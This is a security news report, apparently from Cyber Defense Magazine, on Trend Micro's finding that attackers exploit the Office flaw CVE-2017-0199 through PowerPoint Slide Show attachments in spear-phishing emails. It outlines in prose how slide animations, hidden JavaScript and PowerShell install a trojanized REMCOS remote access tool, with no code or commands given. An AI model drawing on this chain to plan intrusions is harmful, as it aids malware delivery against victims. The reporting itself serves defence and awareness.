CVE-2017-0199: Crooks exploit PowerPoint Slide Show files to deliver malware

According to Trend Micro, cyber criminals abuse the CVE-2017-0199 vulnerability to deliver malware via PowerPoint Slide Show.

In April Microsoft fixed the CVE-2017-0199  vulnerability in Office after threat actors had been exploiting it in the wild.

Hackers leveraged weaponized Rich Text File (RTF) documents exploiting a flaw in Office’s Object Linking and Embedding (OLE) interface to deliver malware such as the DRIDEX banking Trojan.

Now the same issue is being abused in a new way to infect computers with a remote access Trojan.

According to Trend Micro, the same flaw is abused to deliver malware via PowerPoint Slide Show.

“We recently observed a new sample (Detected by Trend Micro as TROJ_CVE20170199.JVU) exploiting CVE-2017-0199 using a new method that abuses PowerPoint Slide Show—the first time we have seen this approach used in the wild before.” reads the analysis published by Trend Micro. “As this is not the first time that CVE-2017-0199 was exploited for an attack, we thought it fitting to analyze this new attack method to provide some insight into how this vulnerability can be abused by other campaigns in the future.”

The weaponized document is delivered as an attachment to a spear-phishing messages that pretend to be sent by a business partner.

The email message is supposedly an order request that doesn’t include other business documents, instead, it has attached a malicious PowerPoint Show (PPSX file) that supposedly exploits the CVE-2017-8570. Experts believe that attackers leveraged this Microsoft Office vulnerability, likely for an error made by the toolkit developer.

Once the file has been executed, PowerPoint initializes the script moniker and launches the remote malicious payload via the PowerPoint Show animations feature by exploiting the Microsoft flaw perched in April. Then it downloads a file called logo.doc, which is instead an XML file with JavaScript code.

The JavaScript runs a PowerShell command to download and execute RATMAN.EXE from its command and control (C&C) server. The file is a Trojanized version of the legitimate  REMCOS remote access tool (RAT).

With this trick, attackers gain full access to the victim’s computer.

The tool leverages an unknown .NET protector to evade detection.

“Ultimately, the use of a new method of attack is a practical consideration; since most detection methods for CVE-2017-0199 focuses on the RTF method of attack, the use of a new vector—PPSX files—allows attackers to evade antivirus detection,” reads the analysis published by Trend Micro.

Trend Micro pointed out the importance of keeping software up to date and paying extra caution when opening documents delivered via spam email or clicking embedded links.

“Users should also always patch their systems with the latest security updates. Given that Microsoft already addressed this vulnerability back in April, users with updated patches are safe from these attacks,” the security researchers also note.

Pierluigi Paganini

FAIR USE NOTICE: Under the "fair use" act, another author may make limited use of the original author's work without asking permission. Pursuant to 17 U.S. Code § 107, certain uses of copyrighted material "for purposes such as criticism, comment, news reporting, teaching (including multiple copies for classroom use), scholarship, or research, is not an infringement of copyright." As a matter of policy, fair use is based on the belief that the public is entitled to freely use portions of copyrighted materials for purposes of commentary and criticism. The fair use privilege is perhaps the most significant limitation on a copyright owner's exclusive rights. Cyber Defense Media Group is a news reporting company, reporting cyber news, events, information and much more at no charge at our website Cyber Defense Magazine. All images and reporting are done exclusively under the Fair Use of the US copyright act.

Global InfoSec Awards 2022

We are in our 10th year, and these awards are incredibly well received – helping build buzz, customer awareness, sales and marketing growth opportunities, investment opportunities and so much more.


10th Anniversary Exclusive Top 100 CISO Conference & Innovators Showcase